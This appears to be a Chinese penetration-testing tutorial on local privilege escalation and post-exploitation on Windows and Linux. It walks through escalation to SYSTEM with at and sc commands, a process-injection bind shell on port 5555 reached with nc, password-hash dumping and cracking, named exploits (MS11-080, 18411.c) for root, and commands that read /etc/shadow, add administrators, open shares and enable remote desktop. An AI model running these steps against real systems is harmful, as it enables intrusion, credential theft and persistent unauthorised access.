信息安全深透测试与工房操作系统本地提权

相逢意气为君饮,系马高楼垂柳边。这篇文章主要讲述信息安全深透测试与工房操作系统本地提权相关的知识,希望能为你提供帮助。
在上一期里我们讲述了怎样公鸡操作系统,那么在取得了操作系统shell的控制权后,可以进行系统提权的操作。

  1. windows系统下的账号提权:

查看账号的详细信息


使用AT命令去指定一个时间调度命令,at 19:39 /interactive cmd。执行后就可以从administrator账号提权到 system账号。



使用SC命令,创建一个服务命令,去重新启用一个新的窗口,类型为交互。sc Create syscmd binPath= "cmd /K start" type= own type= interact
sc start syscmd



也可以使用第三方程序pinjector.exe(进程注入),翻墙才能下载。
下载地址:???http://www.tarasco.org/security/Process_Injector/???

注入到PID656这个进程,用CMD这个程序,如果有人连入5555端口

现在5555端口已经打开

在核客端执行NC命令去连接对方的5555端口就可以使用CMD操作了
  1. 本地缓存密码提取
?在浏览器里输入账号和密码后,根据提示会在浏览器里保存下来,不管是linux还是windows系统。

系统浏览器中有设置缓存的地方:

可以看到管理密码的选项:

系统中有密码管理器:

介绍windows密码恢复和查看工具,下载网站??http://www.nirsoft.net/??

Windows密码恢复工具:

Kali中提取linux下的windows密码工具pwdump,可烤备到windows使用:

打开软件检查本地主机文件

可以看到对应账户和密码,不过都是密文:

把它们保存为记事本文件:

拷备到kali中:

使用cat查看该文件:

使用Ophcrack解密软件对该文件里的内容进行解密:



  1. 利用漏洞提权
?在kali下查看Microsoft 软件中的安全漏洞。网页中查找
? https://technet.microsoft.com/library/security/ms11-080
把.py烤备出来,查看一下里面的内容,可以烤到windows系统里去使用python程序去执行这个文件,不过中文版的windows无法看到提权效果,除非你会修改这个脚本要它适合中文版使用。


在英文版系统下使用效果:



Linux下的Ubuntu11.10 操作系统有个漏洞可以利用,可以先从下面的网址去查看漏洞http://old-releases.ubuntu.com/releases/11.10/

在这个版本下安装gcc软件,需要使用Ubuntu11.10的安装光盘做yum源才能使用下面的命令的安装gcc。sudo apt-cdrom add & & sudo apt-get install gcc

利用gcc 18411.c -o exp,使普通账号能获得root权限。从kali中烤备到目标系统中


利用gcc生成exp文件

然后给exp文件以执行权限

直接执行此命令


此漏洞的博客地址:??http://blog.zx2c4.com/749??
在取得客户端的shell权限后,可以收集相关信息:
Linux系统下收集信息方法:
? /etc/resolv.conf    #DNS配置
? /etc/passwd    #用户账号
? /etc/shadow    #用户密码
? whoami and who –a    #查看当前账号,有谁登陆
? ifconfig -a, iptables -L -n, netstat –r    #查看IP地址,防火墙设置,系统网关和路由
? uname –a, ps aux    #查看系统版本,是否有漏洞或安装补丁。进程PID
? dpkg -l| head  # 当前系统所有的安装包
Windows 系统下收集信息方法:
? ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r  #IP地址配置参数,查看DNS缓存,查看路由网关
? net view , net view /domain  #查网络共享,域共享
? net user /domain, net user %username% /domain   #查看域账号
? net accounts, net share     #查看当前机器开了哪些共享
? net localgroup administrators username /add     #把账号加到管理员组的命令
? net group "Domain Controllers" /domain     #域环境下查看组里的域账号
? net share name$=C:\\ /unlimited     #权限允许情况下开一个共享
? net user username /active:yes /domain  #域环境下启用一个锁定的账号,要有域管理员账号才行。
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION):windows管理框架
? wmic nicconfig get ipaddress,macaddress  #查看底层硬件信息,比如IP、MAC地址
? wmic computersystemget username  #查看计算机账号
? wmic netlogin get name,lastlogon   #查看用户通过网络登陆信息

? wmic process get caption, executablepath,commandline   #查看当前系统进程或命令

? wmic process where name=“calc.exe" call terminate   #可以结束一个进程

? wmic os get name,servicepackmajorversion   #提取操作系统的版本及补丁

? wmic product get name,version   #查看当前系统安装了哪些软件
? wmic product where name=“name” call uninstall /nointeractive   #可以卸载某个软件
? wmic share get /ALL   #查看共享文件夹
? wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1“   #开启远程桌面

? wmic nteventlogget path,filename, writeable  #查看当前日志的名字和存放路径

  这期也讲述的内容不少了,也是因为前期时间一直没有更新,这次补上吧。下次我们来讲讲无线这块的内容。
【信息安全深透测试与工房操作系统本地提权】


    推荐阅读